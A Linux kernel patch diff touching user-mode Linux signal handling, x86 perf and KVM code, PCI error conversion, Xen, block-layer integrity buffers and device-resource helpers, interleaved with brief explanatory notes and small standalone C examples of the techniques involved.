+--- a/arch/um/os-Linux/signal.c
++++ b/arch/um/os-Linux/signal.c
+@@ -8,6 +8,7 @@
+ 
+ #include <stdlib.h>
+ #include <stdarg.h>
++#include <stdbool.h>
+ #include <errno.h>
+ #include <signal.h>
+ #include <string.h>
+@@ -65,9 +66,7 @@ static void sig_handler_common(int sig, struct siginfo *si, mcontext_t *mc)
+ 
+ int signals_enabled;
+ #ifdef UML_CONFIG_UML_TIME_TRAVEL_SUPPORT
+-static int signals_blocked;
+-#else
+-#define signals_blocked 0
++static int signals_blocked, signals_blocked_pending;
+ #endif
+ static unsigned int signals_pending;
+ static unsigned int signals_active = 0;
+@@ -76,14 +75,27 @@ void sig_handler(int sig, struct siginfo *si, mcontext_t *mc)
+ {
+ 	int enabled = signals_enabled;
+ 
+-	if ((signals_blocked || !enabled) && (sig == SIGIO)) {
++#ifdef UML_CONFIG_UML_TIME_TRAVEL_SUPPORT
++	if ((signals_blocked ||
++	     __atomic_load_n(&signals_blocked_pending, __ATOMIC_SEQ_CST)) &&
++	    (sig == SIGIO)) {
++		/* increment so unblock will do another round */
++		__atomic_add_fetch(&signals_blocked_pending, 1,
++				   __ATOMIC_SEQ_CST);
++		return;
++	}
++#endif
++
++	if (!enabled && (sig == SIGIO)) {
+ 		/*
+ 		 * In TT_MODE_EXTERNAL, need to still call time-travel
+-		 * handlers unless signals are also blocked for the
+-		 * external time message processing. This will mark
+-		 * signals_pending by itself (only if necessary.)
++		 * handlers. This will mark signals_pending by itself
++		 * (only if necessary.)
++		 * Note we won't get here if signals are hard-blocked
++		 * (which is handled above), in that case the hard-
++		 * unblock will handle things.
+ 		 */
+-		if (!signals_blocked && time_travel_mode == TT_MODE_EXTERNAL)
++		if (time_travel_mode == TT_MODE_EXTERNAL)
+ 			sigio_run_timetravel_handlers();
+ 		else
+ 			signals_pending |= SIGIO_MASK;
+@@ -380,33 +392,99 @@ int um_set_signals_trace(int enable)
+ #ifdef UML_CONFIG_UML_TIME_TRAVEL_SUPPORT
+ void mark_sigio_pending(void)
+ {
++	/*
++	 * It would seem that this should be atomic so
++	 * it isn't a read-modify-write with a signal
++	 * that could happen in the middle, losing the
++	 * value set by the signal.
++	 *
++	 * However, this function is only called when in
++	 * time-travel=ext simulation mode, in which case
++	 * the only signal ever pending is SIGIO, which
++	 * is blocked while this can be called, and the
++	 * timer signal (SIGALRM) cannot happen.
++	 */
+ 	signals_pending |= SIGIO_MASK;
+ }
+ 
+ void block_signals_hard(void)
+ {
+-	if (signals_blocked)
+-		return;
+-	signals_blocked = 1;
++	signals_blocked++;
+ 	barrier();
+ }
+ 
+ void unblock_signals_hard(void)
+ {
++	static bool unblocking;
++
+ 	if (!signals_blocked)
++		panic("unblocking signals while not blocked");
++
++	if (--signals_blocked)
+ 		return;
+-	/* Must be set to 0 before we check the pending bits etc. */
+-	signals_blocked = 0;
++	/*
++	 * Must be set to 0 before we check pending so the
++	 * SIGIO handler will run as normal unless we're still
++	 * going to process signals_blocked_pending.
++	 */
+ 	barrier();
+ 
+-	if (signals_pending && signals_enabled) {
+-		/* this is a bit inefficient, but that's not really important */
+-		block_signals();
+-		unblock_signals();
+-	} else if (signals_pending & SIGIO_MASK) {
+-		/* we need to run time-travel handlers even if not enabled */
+-		sigio_run_timetravel_handlers();
++	/*
++	 * Note that block_signals_hard()/unblock_signals_hard() can be called
++	 * within the unblock_signals()/sigio_run_timetravel_handlers() below.
++	 * This would still be prone to race conditions since it's actually a
++	 * call _within_ e.g. vu_req_read_message(), where we observed this
++	 * issue, which loops. Thus, if the inner call handles the recorded
++	 * pending signals, we can get out of the inner call with the real
++	 * signal handler no longer blocked, and still have a race. Thus don't
++	 * handle unblocking in the inner call, if it happens, but only in
++	 * the outermost call - 'unblocking' serves as an ownership for the
++	 * signals_blocked_pending decrement.
++	 */
++	if (unblocking)
++		return;
++	unblocking = true;
++
++	while (__atomic_load_n(&signals_blocked_pending, __ATOMIC_SEQ_CST)) {
++		if (signals_enabled) {
++			/* signals are enabled so we can touch this */
++			signals_pending |= SIGIO_MASK;
++			/*
++			 * this is a bit inefficient, but that's
++			 * not really important
++			 */
++			block_signals();
++			unblock_signals();
++		} else {
++			/*
++			 * we need to run time-travel handlers even
++			 * if not enabled
++			 */
++			sigio_run_timetravel_handlers();
++		}
++
++		/*
++		 * The decrement of signals_blocked_pending must be atomic so
++		 * that the signal handler will either happen before or after
++		 * the decrement, not during a read-modify-write:
++		 *  - If it happens before, it can increment it and we'll
++		 *    decrement it and do another round in the loop.
++		 *  - If it happens after it'll see 0 for both signals_blocked
++		 *    and signals_blocked_pending and thus run the handler as
++		 *    usual (subject to signals_enabled, but that's unrelated.)
++		 *
++		 * Note that a call to unblock_signals_hard() within the calls
++		 * to unblock_signals() or sigio_run_timetravel_handlers() above
++		 * will do nothing due to the 'unblocking' state, so this cannot
++		 * underflow as the only one decrementing will be the outermost
++		 * one.
++		 */
++		if (__atomic_sub_fetch(&signals_blocked_pending, 1,
++				       __ATOMIC_SEQ_CST) < 0)
++			panic("signals_blocked_pending underflow");
+ 	}
++
++	unblocking = false;
+ }
+ #endif
+ 
+diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
+index 1394312b732a3..2b2c9fd74ef90 100644
+--- a/arch/x86/events/core.c
++++ b/arch/x86/events/core.c
+@@ -2573,6 +2573,7 @@ static ssize_t set_attr_rdpmc(struct device *cdev,
+ 			      struct device_attribute *attr,
+ 			      const char *buf, size_t count)
+ {
++	static DEFINE_MUTEX(rdpmc_mutex);
+ 	unsigned long val;
+ 	ssize_t ret;
+ 
+@@ -2586,6 +2587,8 @@ static ssize_t set_attr_rdpmc(struct device *cdev,
+ 	if (x86_pmu.attr_rdpmc_broken)
+ 		return -ENOTSUPP;
+ 
++	guard(mutex)(&rdpmc_mutex);
++
+ 	if (val != x86_pmu.attr_rdpmc) {
+ 		/*
+ 		 * Changing into or out of never available or always available,
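
guard(mutex)(&rdpmc_mutex) is the kernel's scope-based lock from <linux/cleanup.h>: the mutex is taken where the guard is declared and dropped automatically on every exit from the scope, built on __attribute__((cleanup)). A rough userspace equivalent with pthreads (guard_mutex() is a stand-in macro, not the kernel one):

#include <pthread.h>
#include <stdio.h>

static void unlock_cleanup(pthread_mutex_t **m)
{
        pthread_mutex_unlock(*m);
}

/* Lock on declaration; the cleanup attribute unlocks at scope exit. */
#define guard_mutex(m) \
        pthread_mutex_t *_g __attribute__((cleanup(unlock_cleanup))) = (m); \
        pthread_mutex_lock(_g)

static pthread_mutex_t rdpmc_mutex = PTHREAD_MUTEX_INITIALIZER;

static int set_attr(int val)
{
        guard_mutex(&rdpmc_mutex);      /* unlocked on any return below */
        if (val > 2)
                return -1;              /* no explicit unlock needed */
        printf("val=%d\n", val);
        return 0;
}

int main(void)
{
        return set_attr(1);
}
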
+diff --git a/arch/x86/events/intel/cstate.c b/arch/x86/events/intel/cstate.c
+index 551741e79e038..8175bff77efa7 100644
+--- a/arch/x86/events/intel/cstate.c
++++ b/arch/x86/events/intel/cstate.c
+@@ -80,7 +80,7 @@
+  *	MSR_PKG_C7_RESIDENCY:  Package C7 Residency Counter.
+  *			       perf code: 0x03
+  *			       Available model: NHM,WSM,SNB,IVB,HSW,BDW,SKL,CNL,
+- *						KBL,CML,ICL,TGL,RKL,ADL,RPL,MTL
++ *						KBL,CML,ICL,TGL,RKL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C8_RESIDENCY:  Package C8 Residency Counter.
+  *			       perf code: 0x04
+@@ -89,8 +89,7 @@
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C9_RESIDENCY:  Package C9 Residency Counter.
+  *			       perf code: 0x05
+- *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL,
+- *						ADL,RPL,MTL
++ *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C10_RESIDENCY: Package C10 Residency Counter.
+  *			       perf code: 0x06
+@@ -584,9 +583,7 @@ static const struct cstate_model adl_cstates __initconst = {
+ 	.pkg_events		= BIT(PERF_CSTATE_PKG_C2_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C3_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C6_RES) |
+-				  BIT(PERF_CSTATE_PKG_C7_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C8_RES) |
+-				  BIT(PERF_CSTATE_PKG_C9_RES) |
+ 				  BIT(PERF_CSTATE_PKG_C10_RES),
+ };
+ 
+diff --git a/arch/x86/events/intel/pt.c b/arch/x86/events/intel/pt.c
+index 42a55794004a7..cc5c6a3264967 100644
+--- a/arch/x86/events/intel/pt.c
++++ b/arch/x86/events/intel/pt.c
+@@ -877,7 +877,7 @@ static void pt_update_head(struct pt *pt)
+  */
+ static void *pt_buffer_region(struct pt_buffer *buf)
+ {
+-	return phys_to_virt(TOPA_ENTRY(buf->cur, buf->cur_idx)->base << TOPA_SHIFT);
++	return phys_to_virt((phys_addr_t)TOPA_ENTRY(buf->cur, buf->cur_idx)->base << TOPA_SHIFT);
+ }
+ 
+ /**
+@@ -989,7 +989,7 @@ pt_topa_entry_for_page(struct pt_buffer *buf, unsigned int pg)
+ 	 * order allocations, there shouldn't be many of these.
+ 	 */
+ 	list_for_each_entry(topa, &buf->tables, list) {
+-		if (topa->offset + topa->size > pg << PAGE_SHIFT)
++		if (topa->offset + topa->size > (unsigned long)pg << PAGE_SHIFT)
+ 			goto found;
+ 	}
+ 
+diff --git a/arch/x86/events/intel/pt.h b/arch/x86/events/intel/pt.h
+index 96906a62aacda..f5e46c04c145d 100644
+--- a/arch/x86/events/intel/pt.h
++++ b/arch/x86/events/intel/pt.h
+@@ -33,8 +33,8 @@ struct topa_entry {
+ 	u64	rsvd2	: 1;
+ 	u64	size	: 4;
+ 	u64	rsvd3	: 2;
+-	u64	base	: 36;
+-	u64	rsvd4	: 16;
++	u64	base	: 40;
++	u64	rsvd4	: 12;
+ };
+ 
+ /* TSC to Core Crystal Clock Ratio */
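
Two fixes cooperate here: the base bitfield grows from 36 to 40 bits so a ToPA entry can address the full physical range after the << 12 shift, and the callers cast to a wide type before shifting, because a left shift performed in 32-bit arithmetic silently drops the high bits. The truncation half is easy to reproduce standalone:

#include <stdio.h>

#define PAGE_SHIFT 12

int main(void)
{
        unsigned int pg = 0x150000;     /* >1M pages, i.e. >4 GiB of buffer */

        /* Shift happens in 32 bits; the result wraps before the
         * assignment widens it. */
        unsigned long bad  = pg << PAGE_SHIFT;
        /* Widen first, then shift, as the fixed code does. */
        unsigned long good = (unsigned long)pg << PAGE_SHIFT;

        printf("bad=%#lx good=%#lx\n", bad, good);
        return 0;
}
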
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index 9b5859812f4fb..d081eb89ba123 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -459,6 +459,7 @@
+ #define SPR_RAW_EVENT_MASK_EXT			0xffffff
+ 
+ /* SPR CHA */
++#define SPR_CHA_EVENT_MASK_EXT			0xffffffff
+ #define SPR_CHA_PMON_CTL_TID_EN			(1 << 16)
+ #define SPR_CHA_PMON_EVENT_MASK			(SNBEP_PMON_RAW_EVENT_MASK | \
+ 						 SPR_CHA_PMON_CTL_TID_EN)
+@@ -475,6 +476,7 @@ DEFINE_UNCORE_FORMAT_ATTR(umask_ext, umask, "config:8-15,32-43,45-55");
+ DEFINE_UNCORE_FORMAT_ATTR(umask_ext2, umask, "config:8-15,32-57");
+ DEFINE_UNCORE_FORMAT_ATTR(umask_ext3, umask, "config:8-15,32-39");
+ DEFINE_UNCORE_FORMAT_ATTR(umask_ext4, umask, "config:8-15,32-55");
++DEFINE_UNCORE_FORMAT_ATTR(umask_ext5, umask, "config:8-15,32-63");
+ DEFINE_UNCORE_FORMAT_ATTR(qor, qor, "config:16");
+ DEFINE_UNCORE_FORMAT_ATTR(edge, edge, "config:18");
+ DEFINE_UNCORE_FORMAT_ATTR(tid_en, tid_en, "config:19");
+@@ -5648,7 +5650,7 @@ static struct intel_uncore_ops spr_uncore_chabox_ops = {
+ 
+ static struct attribute *spr_uncore_cha_formats_attr[] = {
+ 	&format_attr_event.attr,
+-	&format_attr_umask_ext4.attr,
++	&format_attr_umask_ext5.attr,
+ 	&format_attr_tid_en2.attr,
+ 	&format_attr_edge.attr,
+ 	&format_attr_inv.attr,
+@@ -5684,7 +5686,7 @@ ATTRIBUTE_GROUPS(uncore_alias);
+ static struct intel_uncore_type spr_uncore_chabox = {
+ 	.name			= "cha",
+ 	.event_mask		= SPR_CHA_PMON_EVENT_MASK,
+-	.event_mask_ext		= SPR_RAW_EVENT_MASK_EXT,
++	.event_mask_ext		= SPR_CHA_EVENT_MASK_EXT,
+ 	.num_shared_regs	= 1,
+ 	.constraints		= skx_uncore_chabox_constraints,
+ 	.ops			= &spr_uncore_chabox_ops,
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 887a171488ea2..9de3db4a32f80 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1651,7 +1651,7 @@ struct kvm_x86_nested_ops {
+ 	bool (*is_exception_vmexit)(struct kvm_vcpu *vcpu, u8 vector,
+ 				    u32 error_code);
+ 	int (*check_events)(struct kvm_vcpu *vcpu);
+-	bool (*has_events)(struct kvm_vcpu *vcpu);
++	bool (*has_events)(struct kvm_vcpu *vcpu, bool for_injection);
+ 	void (*triple_fault)(struct kvm_vcpu *vcpu);
+ 	int (*get_state)(struct kvm_vcpu *vcpu,
+ 			 struct kvm_nested_state __user *user_kvm_nested_state,
+diff --git a/arch/x86/kernel/devicetree.c b/arch/x86/kernel/devicetree.c
+index 5cd51f25f4461..c77297fa2dad5 100644
+--- a/arch/x86/kernel/devicetree.c
++++ b/arch/x86/kernel/devicetree.c
+@@ -87,7 +87,7 @@ static int x86_of_pci_irq_enable(struct pci_dev *dev)
+ 
+ 	ret = pci_read_config_byte(dev, PCI_INTERRUPT_PIN, &pin);
+ 	if (ret)
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 	if (!pin)
+ 		return 0;
+ 
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 9d683b6067c7b..2283f485a81fb 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3934,7 +3934,7 @@ static bool nested_vmx_preemption_timer_pending(struct kvm_vcpu *vcpu)
+ 	       to_vmx(vcpu)->nested.preemption_timer_expired;
+ }
+ 
+-static bool vmx_has_nested_events(struct kvm_vcpu *vcpu)
++static bool vmx_has_nested_events(struct kvm_vcpu *vcpu, bool for_injection)
+ {
+ 	return nested_vmx_preemption_timer_pending(vcpu) ||
+ 	       to_vmx(vcpu)->nested.mtf_pending;
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 10aff2c9a4e4c..87abf4eebf8a7 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -4980,14 +4980,19 @@ static int vmx_nmi_allowed(struct kvm_vcpu *vcpu, bool for_injection)
+ 	return !vmx_nmi_blocked(vcpu);
+ }
+ 
++bool __vmx_interrupt_blocked(struct kvm_vcpu *vcpu)
++{
++	return !(vmx_get_rflags(vcpu) & X86_EFLAGS_IF) ||
++	       (vmcs_read32(GUEST_INTERRUPTIBILITY_INFO) &
++		(GUEST_INTR_STATE_STI | GUEST_INTR_STATE_MOV_SS));
++}
++
+ bool vmx_interrupt_blocked(struct kvm_vcpu *vcpu)
+ {
+ 	if (is_guest_mode(vcpu) && nested_exit_on_intr(vcpu))
+ 		return false;
+ 
+-	return !(vmx_get_rflags(vcpu) & X86_EFLAGS_IF) ||
+-	       (vmcs_read32(GUEST_INTERRUPTIBILITY_INFO) &
+-		(GUEST_INTR_STATE_STI | GUEST_INTR_STATE_MOV_SS));
++	return __vmx_interrupt_blocked(vcpu);
+ }
+ 
+ static int vmx_interrupt_allowed(struct kvm_vcpu *vcpu, bool for_injection)
+diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
+index e2b04f4c0fef3..9e0bb98b116d1 100644
+--- a/arch/x86/kvm/vmx/vmx.h
++++ b/arch/x86/kvm/vmx/vmx.h
+@@ -413,6 +413,7 @@ u64 construct_eptp(struct kvm_vcpu *vcpu, hpa_t root_hpa, int root_level);
+ bool vmx_guest_inject_ac(struct kvm_vcpu *vcpu);
+ void vmx_update_exception_bitmap(struct kvm_vcpu *vcpu);
+ bool vmx_nmi_blocked(struct kvm_vcpu *vcpu);
++bool __vmx_interrupt_blocked(struct kvm_vcpu *vcpu);
+ bool vmx_interrupt_blocked(struct kvm_vcpu *vcpu);
+ bool vmx_get_nmi_mask(struct kvm_vcpu *vcpu);
+ void vmx_set_nmi_mask(struct kvm_vcpu *vcpu, bool masked);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 53d83b37db8c8..658a88483d8b6 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -10131,7 +10131,7 @@ static int kvm_check_and_inject_events(struct kvm_vcpu *vcpu,
+ 
+ 	if (is_guest_mode(vcpu) &&
+ 	    kvm_x86_ops.nested_ops->has_events &&
+-	    kvm_x86_ops.nested_ops->has_events(vcpu))
++	    kvm_x86_ops.nested_ops->has_events(vcpu, true))
+ 		*req_immediate_exit = true;
+ 
+ 	/*
+@@ -13013,7 +13013,7 @@ static inline bool kvm_vcpu_has_events(struct kvm_vcpu *vcpu)
+ 
+ 	if (is_guest_mode(vcpu) &&
+ 	    kvm_x86_ops.nested_ops->has_events &&
+-	    kvm_x86_ops.nested_ops->has_events(vcpu))
++	    kvm_x86_ops.nested_ops->has_events(vcpu, false))
+ 		return true;
+ 
+ 	if (kvm_xen_has_pending_events(vcpu))
+diff --git a/arch/x86/pci/intel_mid_pci.c b/arch/x86/pci/intel_mid_pci.c
+index 8edd622066044..722a33be08a18 100644
+--- a/arch/x86/pci/intel_mid_pci.c
++++ b/arch/x86/pci/intel_mid_pci.c
+@@ -233,9 +233,9 @@ static int intel_mid_pci_irq_enable(struct pci_dev *dev)
+ 		return 0;
+ 
+ 	ret = pci_read_config_byte(dev, PCI_INTERRUPT_LINE, &gsi);
+-	if (ret < 0) {
++	if (ret) {
+ 		dev_warn(&dev->dev, "Failed to read interrupt line: %d\n", ret);
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 	}
+ 
+ 	id = x86_match_cpu(intel_mid_cpu_ids);
+diff --git a/arch/x86/pci/xen.c b/arch/x86/pci/xen.c
+index 5a4ecf0c2ac4d..b4621cc95e1fd 100644
+--- a/arch/x86/pci/xen.c
++++ b/arch/x86/pci/xen.c
+@@ -38,10 +38,10 @@ static int xen_pcifront_enable_irq(struct pci_dev *dev)
+ 	u8 gsi;
+ 
+ 	rc = pci_read_config_byte(dev, PCI_INTERRUPT_LINE, &gsi);
+-	if (rc < 0) {
++	if (rc) {
+ 		dev_warn(&dev->dev, "Xen PCI: failed to read interrupt line: %d\n",
+ 			 rc);
+-		return rc;
++		return pcibios_err_to_errno(rc);
+ 	}
+ 	/* In PV DomU the Xen PCI backend puts the PIRQ in the interrupt line.*/
+ 	pirq = gsi;
+diff --git a/arch/x86/platform/intel/iosf_mbi.c b/arch/x86/platform/intel/iosf_mbi.c
+index fdd49d70b4373..c81cea208c2c4 100644
+--- a/arch/x86/platform/intel/iosf_mbi.c
++++ b/arch/x86/platform/intel/iosf_mbi.c
+@@ -62,7 +62,7 @@ static int iosf_mbi_pci_read_mdr(u32 mcrx, u32 mcr, u32 *mdr)
+ 
+ fail_read:
+ 	dev_err(&mbi_pdev->dev, "PCI config access failed with %d\n", result);
+-	return result;
++	return pcibios_err_to_errno(result);
+ }
+ 
+ static int iosf_mbi_pci_write_mdr(u32 mcrx, u32 mcr, u32 mdr)
+@@ -91,7 +91,7 @@ static int iosf_mbi_pci_write_mdr(u32 mcrx, u32 mcr, u32 mdr)
+ 
+ fail_write:
+ 	dev_err(&mbi_pdev->dev, "PCI config access failed with %d\n", result);
+-	return result;
++	return pcibios_err_to_errno(result);
+ }
+ 
+ int iosf_mbi_read(u8 port, u8 opcode, u32 offset, u32 *mdr)
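
pci_read_config_*() returns positive PCIBIOS_* status codes rather than negative errnos, which is why all of these call sites now funnel the result through pcibios_err_to_errno() instead of returning it raw. The mapping is small enough to restate standalone (the constants and table below mirror the kernel's, to the best of my reading):

#include <errno.h>
#include <stdio.h>

#define PCIBIOS_SUCCESSFUL              0x00
#define PCIBIOS_FUNC_NOT_SUPPORTED      0x81
#define PCIBIOS_BAD_VENDOR_ID           0x83
#define PCIBIOS_DEVICE_NOT_FOUND        0x86
#define PCIBIOS_BAD_REGISTER_NUMBER     0x87
#define PCIBIOS_SET_FAILED              0x88
#define PCIBIOS_BUFFER_TOO_SMALL        0x89

static int pcibios_err_to_errno(int err)
{
        if (err <= PCIBIOS_SUCCESSFUL)
                return err;             /* already 0 or a negative errno */

        switch (err) {
        case PCIBIOS_FUNC_NOT_SUPPORTED:        return -ENOENT;
        case PCIBIOS_BAD_VENDOR_ID:             return -ENOTTY;
        case PCIBIOS_DEVICE_NOT_FOUND:          return -ENODEV;
        case PCIBIOS_BAD_REGISTER_NUMBER:       return -EFAULT;
        case PCIBIOS_SET_FAILED:                return -EIO;
        case PCIBIOS_BUFFER_TOO_SMALL:          return -ENOSPC;
        }
        return -ERANGE;
}

int main(void)
{
        printf("DEVICE_NOT_FOUND -> %d\n",
               pcibios_err_to_errno(PCIBIOS_DEVICE_NOT_FOUND));
        return 0;
}
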
+diff --git a/arch/x86/xen/p2m.c b/arch/x86/xen/p2m.c
+index 58db86f7b3846..a02cc54338897 100644
+--- a/arch/x86/xen/p2m.c
++++ b/arch/x86/xen/p2m.c
+@@ -736,7 +736,7 @@ int set_foreign_p2m_mapping(struct gnttab_map_grant_ref *map_ops,
+ 		 * immediate unmapping.
+ 		 */
+ 		map_ops[i].status = GNTST_general_error;
+-		unmap[0].host_addr = map_ops[i].host_addr,
++		unmap[0].host_addr = map_ops[i].host_addr;
+ 		unmap[0].handle = map_ops[i].handle;
+ 		map_ops[i].handle = INVALID_GRANT_HANDLE;
+ 		if (map_ops[i].flags & GNTMAP_device_map)
+@@ -746,7 +746,7 @@ int set_foreign_p2m_mapping(struct gnttab_map_grant_ref *map_ops,
+ 
+ 		if (kmap_ops) {
+ 			kmap_ops[i].status = GNTST_general_error;
+-			unmap[1].host_addr = kmap_ops[i].host_addr,
++			unmap[1].host_addr = kmap_ops[i].host_addr;
+ 			unmap[1].handle = kmap_ops[i].handle;
+ 			kmap_ops[i].handle = INVALID_GRANT_HANDLE;
+ 			if (kmap_ops[i].flags & GNTMAP_device_map)
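
The two hunks above replace a stray ',' with ';'. Thanks to precedence the comma was harmless here, since "a = b, c = d;" parses as "(a = b), (c = d);", but the operator is a latent trap in other contexts. A small demonstration:

#include <stdio.h>

int main(void)
{
        int x = 0, y = 0;

        /* Compiles cleanly and both assignments still run, so the
         * bug above was latent; it bites once precedence changes,
         * e.g. "int z = (1, 2);" sets z to 2, and
         * "return x = 1, y;" returns y. */
        x = 1,
        y = 2;

        printf("x=%d y=%d, (1, 2) evaluates to %d\n", x, y, (1, 2));
        return 0;
}
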
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 4533eb4916610..adbc00449a9c6 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -199,8 +199,7 @@ bool bio_integrity_prep(struct bio *bio)
+ 	unsigned long start, end;
+ 	unsigned int len, nr_pages;
+ 	unsigned int bytes, offset, i;
+-	unsigned int intervals;
+-	blk_status_t status;
++	gfp_t gfp = GFP_NOIO;
+ 
+ 	if (!bi)
+ 		return true;
+@@ -223,13 +222,19 @@ bool bio_integrity_prep(struct bio *bio)
+ 		if (!bi->profile->generate_fn ||
+ 		    !(bi->flags & BLK_INTEGRITY_GENERATE))
+ 			return true;
++
++		/*
++		 * Zero the memory allocated to not leak uninitialized kernel
++		 * memory to disk.  For PI this only affects the app tag, but
++		 * for non-integrity metadata it affects the entire metadata
++		 * buffer.
++		 */
++		gfp |= __GFP_ZERO;
+ 	}
+-	intervals = bio_integrity_intervals(bi, bio_sectors(bio));
+ 
+ 	/* Allocate kernel buffer for protection data */
+-	len = intervals * bi->tuple_size;
+-	buf = kmalloc(len, GFP_NOIO);
+-	status = BLK_STS_RESOURCE;
++	len = bio_integrity_bytes(bi, bio_sectors(bio));
++	buf = kmalloc(len, gfp);
+ 	if (unlikely(buf == NULL)) {
+ 		printk(KERN_ERR "could not allocate integrity buffer\n");
+ 		goto err_end_io;
+@@ -244,7 +249,6 @@ bool bio_integrity_prep(struct bio *bio)
+ 	if (IS_ERR(bip)) {
+ 		printk(KERN_ERR "could not allocate data integrity bioset\n");
+ 		kfree(buf);
+-		status = BLK_STS_RESOURCE;
+ 		goto err_end_io;
+ 	}
+ 
+@@ -272,7 +276,6 @@ bool bio_integrity_prep(struct bio *bio)
+ 
+ 		if (ret == 0) {
+ 			printk(KERN_ERR "could not attach integrity payload\n");
+-			status = BLK_STS_RESOURCE;
+ 			goto err_end_io;
+ 		}
+ 
+@@ -294,7 +297,7 @@ bool bio_integrity_prep(struct bio *bio)
+ 	return true;
+ 
+ err_end_io:
+-	bio->bi_status = status;
++	bio->bi_status = BLK_STS_RESOURCE;
+ 	bio_endio(bio);
+ 	return false;
+ 
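
Adding __GFP_ZERO matters because this buffer can reach the disk without every byte being generated first; whatever the allocator handed back would otherwise be written out as metadata. The userspace analogue is the malloc()/calloc() distinction:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
        size_t len = 64;
        unsigned char *dirty = malloc(len);     /* contents indeterminate */
        unsigned char *clean = calloc(1, len);  /* guaranteed zeroed */

        /* Only part of the buffer is generated... */
        memset(clean, 0xab, len / 2);
        /* ...the tail of "clean" is still zero, while the same
         * pattern on "dirty" would ship whatever was already there. */
        printf("tail byte: %#x\n", clean[len - 1]);
        free(dirty);
        free(clean);
        return 0;
}
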
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 46111f8c12e61..e0ef648df265b 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -569,9 +569,7 @@ static bool binder_has_work(struct binder_thread *thread, bool do_proc_work)
+ static bool binder_available_for_proc_work_ilocked(struct binder_thread *thread)
+ {
+ 	return !thread->transaction_stack &&
+-		binder_worklist_empty_ilocked(&thread->todo) &&
+-		(thread->looper & (BINDER_LOOPER_STATE_ENTERED |
+-				   BINDER_LOOPER_STATE_REGISTERED));
++		binder_worklist_empty_ilocked(&thread->todo);
+ }
+ 
+ static void binder_wakeup_poll_threads_ilocked(struct binder_proc *proc,
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 65fde5717928b..c8970453b4d9f 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -900,11 +900,8 @@ static void ata_gen_passthru_sense(struct ata_queued_cmd *qc)
+ 				   &sense_key, &asc, &ascq, verbose);
+ 		ata_scsi_set_sense(qc->dev, cmd, sense_key, asc, ascq);
+ 	} else {
+-		/*
+-		 * ATA PASS-THROUGH INFORMATION AVAILABLE
+-		 * Always in descriptor format sense.
+-		 */
+-		scsi_build_sense(cmd, 1, RECOVERED_ERROR, 0, 0x1D);
++		/* ATA PASS-THROUGH INFORMATION AVAILABLE */
++		ata_scsi_set_sense(qc->dev, cmd, RECOVERED_ERROR, 0, 0x1D);
+ 	}
+ 
+ 	if ((cmd->sense_buffer[0] & 0x7f) >= 0x72) {
+diff --git a/drivers/auxdisplay/ht16k33.c b/drivers/auxdisplay/ht16k33.c
+index 02425991c1590..57b4efff344e3 100644
+--- a/drivers/auxdisplay/ht16k33.c
++++ b/drivers/auxdisplay/ht16k33.c
+@@ -507,6 +507,7 @@ static int ht16k33_led_probe(struct device *dev, struct led_classdev *led,
+ 	led->max_brightness = MAX_BRIGHTNESS;
+ 
+ 	err = devm_led_classdev_register_ext(dev, led, &init_data);
++	fwnode_handle_put(init_data.fwnode);
+ 	if (err)
+ 		dev_err(dev, "Failed to register LED\n");
+ 
+diff --git a/drivers/base/devres.c b/drivers/base/devres.c
+index 4ab2b50ee38f4..f9add2ecdc554 100644
+--- a/drivers/base/devres.c
++++ b/drivers/base/devres.c
+@@ -892,9 +892,12 @@ void *devm_krealloc(struct device *dev, void *ptr, size_t new_size, gfp_t gfp)
+ 	/*
+ 	 * Otherwise: allocate new, larger chunk. We need to allocate before
+ 	 * taking the lock as most probably the caller uses GFP_KERNEL.
++	 * alloc_dr() will call check_dr_size() to reserve extra memory
++	 * for struct devres automatically, so the user-requested @new_size
++	 * is passed to it directly, just as devm_kmalloc() does.
+ 	 */
+ 	new_dr = alloc_dr(devm_kmalloc_release,
+-			  total_new_size, gfp, dev_to_node(dev));
++			  new_size, gfp, dev_to_node(dev));
+ 	if (!new_dr)
+ 		return NULL;
+ 
+@@ -1218,7 +1221,11 @@ EXPORT_SYMBOL_GPL(__devm_alloc_percpu);
+  */
+ void devm_free_percpu(struct device *dev, void __percpu *pdata)
+ {
+-	WARN_ON(devres_destroy(dev, devm_percpu_release, devm_percpu_match,
++	/*
++	 * Use devres_release() to prevent memory leakage as
++	 * devm_free_pages() does.
++	 */
++	WARN_ON(devres_release(dev, devm_percpu_release, devm_percpu_match,
+ 			       (__force void *)pdata));
+ }
